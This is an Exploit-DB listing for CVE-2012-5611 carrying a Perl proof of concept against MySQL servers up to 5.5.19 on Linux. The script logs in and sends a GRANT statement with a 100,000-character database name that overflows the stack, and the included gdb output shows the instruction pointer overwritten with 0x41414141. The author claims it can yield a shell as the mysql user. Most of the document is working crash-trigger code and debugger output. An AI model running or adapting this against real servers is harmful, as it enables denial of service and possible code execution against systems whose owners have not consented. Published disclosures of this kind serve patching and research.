MySQL (Linux) - Stack Based Buffer Overrun PoC (0day)



EDB-ID: 23075 CVE: 2012-5611 OSVDB-ID: 88066
Author: kingcope Published: 2012-12-02 Verified: Not Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
#!/usr/bin/perl
=for comment

 MySQL Server exploitable stack based overrun
 Ver 5.5.19-log for Linux and below (tested with Ver 5.1.53-log for suse-linux-gnu too)
 unprivileged user (any account (anonymous account?), post auth)
 as illustrated below the instruction pointer is overwritten with 0x41414141
 bug found by Kingcope
 this will yield a shell as the user 'mysql' when properly exploited
 
mysql@linux-lsd2:/root> gdb -c /var/lib/mysql/core
GNU gdb (GDB) SUSE (7.2-3.3)
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i586-suse-linux".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Missing separate debuginfo for the main executable file
Try: zypper install -C "debuginfo(build-id)=768fdbea8f1bf1f7cfb34c7f532f7dd0bdd76803"
[New Thread 8801]
[New Thread 8789]
[New Thread 8793]
[New Thread 8791]
[New Thread 8787]
[New Thread 8790]
[New Thread 8799]
[New Thread 8794]
[New Thread 8792]
[New Thread 8788]
[New Thread 8800]
[New Thread 8786]
[New Thread 8797]
[New Thread 8798]
[New Thread 8785]
[New Thread 8796]
[New Thread 8783]
Core was generated by `/usr/local/mysql/bin/mysqld --log=/tmp/mysqld.log'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb)
=cut

  use strict;
  use DBI();

  # Connect to the database.
  my $dbh = DBI->connect("DBI:mysql:database=test;host=192.168.2.3;",
                         "user", "secret",
                         {'RaiseError' => 1});

  $a ="A" x 100000;
  my $sth = $dbh->prepare("grant file on $a.* to 'user'\@'%' identified by 'secret';");
  $sth->execute();
  
  # Disconnect from the database.
  $dbh->disconnect();